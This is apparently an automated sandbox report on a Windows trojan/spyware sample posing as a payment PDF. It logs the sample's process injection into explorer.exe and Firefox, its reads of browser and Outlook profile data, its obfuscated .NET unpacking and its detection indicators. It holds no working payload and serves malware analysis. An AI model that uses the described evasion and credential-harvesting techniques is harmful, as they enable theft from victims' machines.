            Source: 0.2.swift_payment_pdf.exe.7450000.5.raw.unpack, DsPhWEG7fYA6PrMRVN.csSecurity API names: _0020.AddAccessRule
            Source: 0.2.swift_payment_pdf.exe.4b47890.3.raw.unpack, DsPhWEG7fYA6PrMRVN.csSecurity API names: _0020.SetAccessControl
            Source: 0.2.swift_payment_pdf.exe.4b47890.3.raw.unpack, DsPhWEG7fYA6PrMRVN.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.swift_payment_pdf.exe.4b47890.3.raw.unpack, DsPhWEG7fYA6PrMRVN.csSecurity API names: _0020.AddAccessRule
            Source: 0.2.swift_payment_pdf.exe.4ac3a70.2.raw.unpack, VYn5ZC04Xh7blNpXED.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.swift_payment_pdf.exe.7450000.5.raw.unpack, VYn5ZC04Xh7blNpXED.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/2@10/7
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\swift_payment_pdf.exe.logJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeMutant created: NULL
            Source: C:\Windows\SysWOW64\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\782yF2SJJump to behavior
            Source: C:\Program Files (x86)\PGIzXOBshIiSnGcNkZxrkfaOPtrgbMvqBOSRsBsN\AbWHWpocGREf.exeProcess created: C:\Windows\SysWOW64\explorer.exe
            Source: C:\Program Files (x86)\PGIzXOBshIiSnGcNkZxrkfaOPtrgbMvqBOSRsBsN\AbWHWpocGREf.exeProcess created: C:\Windows\SysWOW64\explorer.exeJump to behavior
            Source: swift_payment_pdf.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: swift_payment_pdf.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
            Source: C:\Program Files\Mozilla Firefox\firefox.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: explorer.exe, 00000007.00000002.3553716151.000000000324D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3553716151.000000000326E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: swift_payment_pdf.exeVirustotal: Detection: 26%
            Source: unknownProcess created: C:\Users\user\Desktop\swift_payment_pdf.exe "C:\Users\user\Desktop\swift_payment_pdf.exe"
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeProcess created: C:\Users\user\Desktop\swift_payment_pdf.exe "C:\Users\user\Desktop\swift_payment_pdf.exe"
            Source: C:\Program Files (x86)\PGIzXOBshIiSnGcNkZxrkfaOPtrgbMvqBOSRsBsN\AbWHWpocGREf.exeProcess created: C:\Windows\SysWOW64\explorer.exe "C:\Windows\SysWOW64\explorer.exe"
            Source: C:\Windows\SysWOW64\explorer.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeProcess created: C:\Users\user\Desktop\swift_payment_pdf.exe "C:\Users\user\Desktop\swift_payment_pdf.exe"Jump to behavior
            Source: C:\Program Files (x86)\PGIzXOBshIiSnGcNkZxrkfaOPtrgbMvqBOSRsBsN\AbWHWpocGREf.exeProcess created: C:\Windows\SysWOW64\explorer.exe "C:\Windows\SysWOW64\explorer.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeSection loaded: dwrite.dllJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeSection loaded: windowscodecs.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: aepic.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: twinapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: powrprof.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dxgi.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wtsapi32.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dwmapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: twinapi.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: umpdc.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: ieframe.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: netapi32.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wkscli.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: mlang.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: winsqlite3.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: vaultcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Program Files (x86)\PGIzXOBshIiSnGcNkZxrkfaOPtrgbMvqBOSRsBsN\AbWHWpocGREf.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Program Files (x86)\PGIzXOBshIiSnGcNkZxrkfaOPtrgbMvqBOSRsBsN\AbWHWpocGREf.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Program Files (x86)\PGIzXOBshIiSnGcNkZxrkfaOPtrgbMvqBOSRsBsN\AbWHWpocGREf.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Program Files (x86)\PGIzXOBshIiSnGcNkZxrkfaOPtrgbMvqBOSRsBsN\AbWHWpocGREf.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Program Files (x86)\PGIzXOBshIiSnGcNkZxrkfaOPtrgbMvqBOSRsBsN\AbWHWpocGREf.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Program Files (x86)\PGIzXOBshIiSnGcNkZxrkfaOPtrgbMvqBOSRsBsN\AbWHWpocGREf.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
            Source: swift_payment_pdf.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
            Source: swift_payment_pdf.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: swift_payment_pdf.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: explorer.pdbUGP source: AbWHWpocGREf.exe, 00000006.00000003.2193822463.000000000520F000.00000004.00000001.00020000.00000000.sdmp, AbWHWpocGREf.exe, 00000006.00000003.2192638369.0000000004DAB000.00000004.00000001.00020000.00000000.sdmp
            Source: Binary string: iDIX.pdb source: swift_payment_pdf.exe
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: AbWHWpocGREf.exe, 00000006.00000000.2178286710.00000000001CE000.00000002.00000001.01000000.0000000C.sdmp, AbWHWpocGREf.exe, 00000008.00000000.2318584238.00000000001CE000.00000002.00000001.01000000.0000000C.sdmp
            Source: Binary string: iDIX.pdbSHA256 source: swift_payment_pdf.exe
            Source: Binary string: wntdll.pdbUGP source: swift_payment_pdf.exe, 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2255178706.0000000004DF1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3555138631.0000000004FA0000.00000040.00001000.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3555138631.000000000513E000.00000040.00001000.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2253539982.0000000004C4C000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: swift_payment_pdf.exe, swift_payment_pdf.exe, 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, explorer.exe, explorer.exe, 00000007.00000003.2255178706.0000000004DF1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3555138631.0000000004FA0000.00000040.00001000.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3555138631.000000000513E000.00000040.00001000.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2253539982.0000000004C4C000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: explorer.pdb source: AbWHWpocGREf.exe, 00000006.00000003.2193822463.000000000520F000.00000004.00000001.00020000.00000000.sdmp, AbWHWpocGREf.exe, 00000006.00000003.2192638369.0000000004DAB000.00000004.00000001.00020000.00000000.sdmp

            Data Obfuscation

            barindex
            .NET source code contains potential unpacker
            Source: swift_payment_pdf.exe, StringListEditor.cs.Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
            Source: 0.2.swift_payment_pdf.exe.4b47890.3.raw.unpack, DsPhWEG7fYA6PrMRVN.cs.Net Code: Bfau2X4LvA System.Reflection.Assembly.Load(byte[])
            Source: 0.2.swift_payment_pdf.exe.7450000.5.raw.unpack, DsPhWEG7fYA6PrMRVN.cs.Net Code: Bfau2X4LvA System.Reflection.Assembly.Load(byte[])
            Source: 0.2.swift_payment_pdf.exe.2ee85a0.1.raw.unpack, -Module-.cs.Net Code: _200D_200D_202B_206F_206A_206B_202B_200B_200D_206D_200C_206B_206A_200B_202E_200C_200E_202A_200E_206D_206F_202D_206F_206D_206C_200F_206A_202D_206C_202B_206A_206F_202A_206A_200E_200F_200B_200F_202E_202D_202E System.Reflection.Assembly.Load(byte[])
            Source: 0.2.swift_payment_pdf.exe.2ee85a0.1.raw.unpack, PingPong.cs.Net Code: _206E_206D_206E_206E_202E_202E_200C_206A_202D_206E_200C_202B_200F_206E_200B_202E_200E_202A_202D_200E_200E_200E_200E_202B_200E_202C_200C_200B_202C_202D_200C_202A_200B_200C_206D_206B_202B_202A_202E_200C_202E System.Reflection.Assembly.Load(byte[])
            Source: 0.2.swift_payment_pdf.exe.7a50000.6.raw.unpack, -Module-.cs.Net Code: _200D_200D_202B_206F_206A_206B_202B_200B_200D_206D_200C_206B_206A_200B_202E_200C_200E_202A_200E_206D_206F_202D_206F_206D_206C_200F_206A_202D_206C_202B_206A_206F_202A_206A_200E_200F_200B_200F_202E_202D_202E System.Reflection.Assembly.Load(byte[])
            Source: 0.2.swift_payment_pdf.exe.7a50000.6.raw.unpack, PingPong.cs.Net Code: _206E_206D_206E_206E_202E_202E_200C_206A_202D_206E_200C_202B_200F_206E_200B_202E_200E_202A_202D_200E_200E_200E_200E_202B_200E_202C_200C_200B_202C_202D_200C_202A_200B_200C_206D_206B_202B_202A_202E_200C_202E System.Reflection.Assembly.Load(byte[])
            Source: 0.2.swift_payment_pdf.exe.4ac3a70.2.raw.unpack, DsPhWEG7fYA6PrMRVN.cs.Net Code: Bfau2X4LvA System.Reflection.Assembly.Load(byte[])
            Source: 7.2.explorer.exe.55ccd08.2.raw.unpack, StringListEditor.cs.Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
            Source: 8.0.AbWHWpocGREf.exe.26acd08.1.raw.unpack, StringListEditor.cs.Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
            Source: 8.2.AbWHWpocGREf.exe.26acd08.1.raw.unpack, StringListEditor.cs.Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
            Source: 9.2.firefox.exe.c89cd08.0.raw.unpack, StringListEditor.cs.Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 0_2_014C9C40 pushad ; iretd 0_2_014C9C6D
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 0_2_04ED93E0 push esp; iretd 0_2_04ED93E1
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_0041A874 push cs; iretd 5_2_0041A875
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_004248F3 push edi; ret 5_2_004248FE
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_0040209B push cs; retf 5_2_004020C7
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_004051BA push esi; ret 5_2_004051C7
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_0040729C push edi; retf 5_2_004072CB
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_00403410 push eax; ret 5_2_00403412
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_0040CCD1 push ecx; iretd 5_2_0040CCD7
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_0040ADEE push ss; ret 5_2_0040ADEF
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_0042C743 push eax; iretd 5_2_0042C8F1
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_0040A777 push ebx; iretd 5_2_0040A7B2
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_0132225F pushad ; ret 5_2_013227F9
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013227FA pushad ; ret 5_2_013227F9
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013509AD push ecx; mov dword ptr [esp], ecx5_2_013509B6
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_0132283D push eax; iretd 5_2_01322858
            Source: C:\Program Files (x86)\PGIzXOBshIiSnGcNkZxrkfaOPtrgbMvqBOSRsBsN\AbWHWpocGREf.exeCode function: 6_2_0493B437 pushad ; iretd 6_2_0493B438
            Source: C:\Program Files (x86)\PGIzXOBshIiSnGcNkZxrkfaOPtrgbMvqBOSRsBsN\AbWHWpocGREf.exeCode function: 6_2_04926C5D push ebx; iretd 6_2_04926C98
            Source: C:\Program Files (x86)\PGIzXOBshIiSnGcNkZxrkfaOPtrgbMvqBOSRsBsN\AbWHWpocGREf.exeCode function: 6_2_04940DD9 push edi; ret 6_2_04940DE4
            Source: C:\Program Files (x86)\PGIzXOBshIiSnGcNkZxrkfaOPtrgbMvqBOSRsBsN\AbWHWpocGREf.exeCode function: 6_2_04936D5A push cs; iretd 6_2_04936D5B
            Source: C:\Program Files (x86)\PGIzXOBshIiSnGcNkZxrkfaOPtrgbMvqBOSRsBsN\AbWHWpocGREf.exeCode function: 6_2_049216A0 push esi; ret 6_2_049216AD
            Source: C:\Program Files (x86)\PGIzXOBshIiSnGcNkZxrkfaOPtrgbMvqBOSRsBsN\AbWHWpocGREf.exeCode function: 6_2_04923782 push edi; retf 6_2_049237B1
            Source: C:\Program Files (x86)\PGIzXOBshIiSnGcNkZxrkfaOPtrgbMvqBOSRsBsN\AbWHWpocGREf.exeCode function: 6_2_049291B7 push ecx; iretd 6_2_049291BD
            Source: C:\Program Files (x86)\PGIzXOBshIiSnGcNkZxrkfaOPtrgbMvqBOSRsBsN\AbWHWpocGREf.exeCode function: 6_2_0493B1C7 pushad ; iretd 6_2_0493B1C8
            Source: C:\Program Files (x86)\PGIzXOBshIiSnGcNkZxrkfaOPtrgbMvqBOSRsBsN\AbWHWpocGREf.exeCode function: 6_2_049272D4 push ss; ret 6_2_049272D5
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_04FA27FA pushad ; ret 7_2_04FA27F9
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_04FA225F pushad ; ret 7_2_04FA27F9
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_04FA283D push eax; iretd 7_2_04FA2858
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_04FD09AD push ecx; mov dword ptr [esp], ecx7_2_04FD09B6
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_04FA1368 push eax; iretd 7_2_04FA1369
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_02EFE2D0 push cs; iretd 7_2_02EFE323
            Source: swift_payment_pdf.exeStatic PE information: section name: .text entropy: 7.951002807224344
            Source: 0.2.swift_payment_pdf.exe.4b47890.3.raw.unpack, K22sTI10TLEnmqFWQX.csHigh entropy of concatenated method names: 'YUYeCpfrvI', 'RTWeo4HwIW', 'Yc3eu5lqX6', 'HKYeYjwxvJ', 'bCSeGhAgq5', 'sbLerkFsBh', 'ytPe3Bb9Bw', 'QIKiKmFW2U', 'Fw3iJGSGWS', 'gJHi4D3lgA'
            Source: 0.2.swift_payment_pdf.exe.4b47890.3.raw.unpack, NwqgU75Q3WklKJuK95.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'nP0W4OxP5l', 'd8YWD2k32e', 'mqtWz658GJ', 'IIsoFgVfsZ', 'sgmoCYRfi2', 'dOPoWLcX99', 's3boo7Kved', 'ENAREod8kUaM2fjv8QD'
            Source: 0.2.swift_payment_pdf.exe.4b47890.3.raw.unpack, Vvei5OXXISPxIy8J1T.csHigh entropy of concatenated method names: 'ze8rUG52X7', 'TZCrEyXMt8', 'KpgM1Ib6xZ', 'g48MyZo04L', 'SFWMjDsCiQ', 'jljMAKspLE', 'ImXMQFTtji', 'vCeM945VRP', 'rN4MxPmy3s', 'E33M5b4odi'
            Source: 0.2.swift_payment_pdf.exe.4b47890.3.raw.unpack, VYn5ZC04Xh7blNpXED.csHigh entropy of concatenated method names: 'rwFG6ovSWi', 'Po3G0xKlfr', 'pHwGT44cKu', 'FQ6GNRALcV', 'dotGS5jaVg', 'SweGwBfuV8', 'wd7GKSSVSA', 'g8cGJVbkJW', 'XTEG4GlbjI', 'ReLGDL1mbS'
            Source: 0.2.swift_payment_pdf.exe.4b47890.3.raw.unpack, cT6mCptZsNYngMt5JL.csHigh entropy of concatenated method names: 'ifZiYt5nBV', 'OrFiG8bgeG', 'JD6iMTY0LF', 'lVdir2TfeQ', 'L39i3y5lIH', 'xggivMUHp3', 'Lr1iVMfDVt', 'WpqiRkqiIF', 'AYEiZPC092', 'Ym3ipZmv03'
            Source: 0.2.swift_payment_pdf.exe.4b47890.3.raw.unpack, nn0dYmoWlVmAMqLHuC.csHigh entropy of concatenated method names: 'bttvbwMgxi', 'awlvHLm0EO', 'xnFv2K6ui4', 'gAmvIfhHno', 'agDvUNfShe', 'uj4vkMuqgS', 'BnDvE4c1Ds', 'sNcvc2xZgV', 'xT0vtsuvh0', 'UUmvgCBJ53'
            Source: 0.2.swift_payment_pdf.exe.4b47890.3.raw.unpack, kOBUaOVQ5piXnJWiuMJ.csHigh entropy of concatenated method names: 'XLJebiWVLv', 'bLNeHEjHX4', 'y53e2oH5Kx', 'vKneImBco9', 'TlYeU7loXO', 'YXxekCGHkK', 'SWjeEc3BZq', 'bcOecqTlIu', 'aoLet7Uih7', 'MhLegSAfd2'
            Source: 0.2.swift_payment_pdf.exe.4b47890.3.raw.unpack, y1ibDTrE6BWROJqcoa.csHigh entropy of concatenated method names: 'ecOXVfxcpSZuDEQX1K0', 'BmFMNyx0WUDGPduZsrP', 'DN03iu0pPG', 'oMl3evicDL', 'HUh3XgwfhO', 'PwywRbx9FVNqFtTBIIb', 'oqXm7Gx2HsLR2ftqWhJ'
            Source: 0.2.swift_payment_pdf.exe.4b47890.3.raw.unpack, yOwvLKV6yBbqRyw99XL.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'xcRX6FIBL7', 'iBYX064Bur', 'PvRXTLg7BR', 'QeEXNiQdck', 'zZNXSmK2bc', 'KF9Xwsw1HD', 'agQXKdHsyw'
            Source: 0.2.swift_payment_pdf.exe.4b47890.3.raw.unpack, nfiGd2JckkN7waNTNT.csHigh entropy of concatenated method names: 'ewovYVxtMs', 'kA2vMpVPS7', 'bXdv3eAkRt', 'i1u3DvEhZ9', 'mJ73z5Ypmc', 'HejvF6BHEy', 'ruBvCxQm8j', 'RPYvWxjX8C', 'XtpvoxGhBd', 'rBJvuO7TKN'
            Source: 0.2.swift_payment_pdf.exe.4b47890.3.raw.unpack, hf2GnK73C7uyAUGYyh.csHigh entropy of concatenated method names: 'QwtsZnVaeZ', 'WdEspxHysN', 'ToString', 'IfBsYd5Qxi', 'XeGsGSvYZa', 'kw2sM0SROh', 'u95srltRrL', 'n6Ws3oWXO2', 'b2fsvDyMd5', 'QXtsVJP97A'
            Source: 0.2.swift_payment_pdf.exe.4b47890.3.raw.unpack, snC1gDPdXbxgOUtoyd.csHigh entropy of concatenated method names: 'Dispose', 'mjJC4NEZC4', 'fYQWmpMnEw', 'OFDddP2HL4', 'DUwCDhTH8v', 'UHNCzrWP4o', 'ProcessDialogKey', 'qImWFpqVxo', 'DboWCyBqyT', 'EXvWWgo6AU'
            Source: 0.2.swift_payment_pdf.exe.4b47890.3.raw.unpack, HNAg6nCmQTk1mWUs0C.csHigh entropy of concatenated method names: 'uSa2iUhf5', 'S8XItdyp5', 'K3Akd8TUH', 'maAEck55X', 'hwetZNdHS', 'npVghv2wL', 'bQFcD8aEv9mCcu1osi', 'KGdQ5UbAAaH9XptG5u', 'raLiFs1Vp', 'mxPXw5vmv'
            Source: 0.2.swift_payment_pdf.exe.4b47890.3.raw.unpack, zMjFbSkaBuf7I5WL3T.csHigh entropy of concatenated method names: 'MxTsJb09KA', 'UVfsDJEPip', 'io8iFwJOpe', 'W3RiCVZfWR', 'FuxsBHim4t', 'C5bsOwe0PM', 'gijsPtL16k', 'GmJs6BefUr', 'YY3s05cyhL', 'x0IsTyXQNM'
            Source: 0.2.swift_payment_pdf.exe.4b47890.3.raw.unpack, YUErdkgo3QAl0D7abE.csHigh entropy of concatenated method names: 'H13MIMLG73', 'cXJMknL97g', 'NolMc6JNQ3', 'Dy4MttfLdo', 'Rb9MauwUuP', 'MIXMlJa1pp', 'aOoMspROZh', 'DjwMiNvDQf', 'KNYMetbsPf', 'TdFMXNKCwj'
            Source: 0.2.swift_payment_pdf.exe.4b47890.3.raw.unpack, SVDkUhBLLGiaL3Zguc.csHigh entropy of concatenated method names: 'zrx3hsUjAD', 'QTe3bY3D7G', 'cXk32asFeZ', 'nhI3IyA8xu', 'cZh3kMSg8h', 'Qyq3E6ARIP', 'O9j3tRGN6f', 'MBR3gjN2V0', 'z0Fjf1xuUTRgowbIeHH', 'iI0fp7xXxHQiyndJOAw'
            Source: 0.2.swift_payment_pdf.exe.4b47890.3.raw.unpack, DsPhWEG7fYA6PrMRVN.csHigh entropy of concatenated method names: 'Yt6ofm4K6L', 'ObfoYNiHkr', 'TBloGlK2vH', 'ksooM0XNdg', 'iFiorEhXWM', 'gjco3r2tpu', 'SNEov1HTuI', 'ptRoVdQlrJ', 'CpVoRH3cE3', 'YMMoZduy4J'
            Source: 0.2.swift_payment_pdf.exe.4b47890.3.raw.unpack, uagZMlT2PRIcd5mHmc.csHigh entropy of concatenated method names: 'pP53fMfPhH', 'i4b3Gqo91k', 'glL3rh3CXW', 'Ppu3vxUSn7', 'Wop3V5ZkCn', 'KKArSeXIpo', 'RkdrwgUJFX', 'SCXrK18yog', 'miVrJe2sL1', 'aXhr4ICuDu'
            Source: 0.2.swift_payment_pdf.exe.4b47890.3.raw.unpack, FaEFox84HGc74nOAsU.csHigh entropy of concatenated method names: 'dqmqccBDIZ', 'Pg1qtF2JXo', 'd4yqLsYyII', 'WD2qmThoOZ', 'I2Oqyo40GS', 'EKbqjo3tNr', 'HBMqQMxfwL', 'Rd9q9nrq1i', 'MeFq5xa4yG', 'cVNqB6ouG8'
            Source: 0.2.swift_payment_pdf.exe.4b47890.3.raw.unpack, aONjcELFZUjJUNTQZU.csHigh entropy of concatenated method names: 'wbyCvZxAgt', 'STyCVKXv3y', 'suqCZcYZL6', 'zWjCpLiFdT', 'al2CaGpZrT', 'OOAClsVBdE', 'vBI8E9I2CZZELYyZi1', 'GYIJDI5TPD3typy6pQ', 'GCpCCe8u5W', 'PM0CoRf5ZR'
            Source: 0.2.swift_payment_pdf.exe.4b47890.3.raw.unpack, JMdMrPaRA1fNwKBYnF.csHigh entropy of concatenated method names: 'NetiLesb88', 'n4Fim9Q3LG', 'Sbji1hs4GD', 'sKHiyhUHHg', 'OQki6e3DL4', 'YkSijt5L2w', 'Next', 'Next', 'Next', 'NextBytes'
